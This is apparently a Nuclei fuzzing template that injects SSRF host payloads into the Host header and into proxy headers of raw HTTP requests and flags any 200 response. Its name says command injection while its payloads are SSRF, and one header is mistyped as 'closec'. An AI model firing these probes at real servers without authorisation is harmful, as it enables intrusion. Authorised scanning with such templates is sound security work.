id: ssrf-header-injection

info:
  name: Header Command Injection
  author: nullrabbit
  severity: high
  description: Fuzzing headers for command injection
  tags: fuzz,ssrf

requests:
  - payloads:
      payload: ssrf-hosts.txt
      header: proxy-headers.txt

    raw:
      - |
        GET / HTTP/1.1
        Host: §payload§
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        Connection: close
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
        §header§ §payload§
        Connection: closec

    attack: clusterbomb
    threads: 10
    matchers:
    - type: status
      status:
        - 200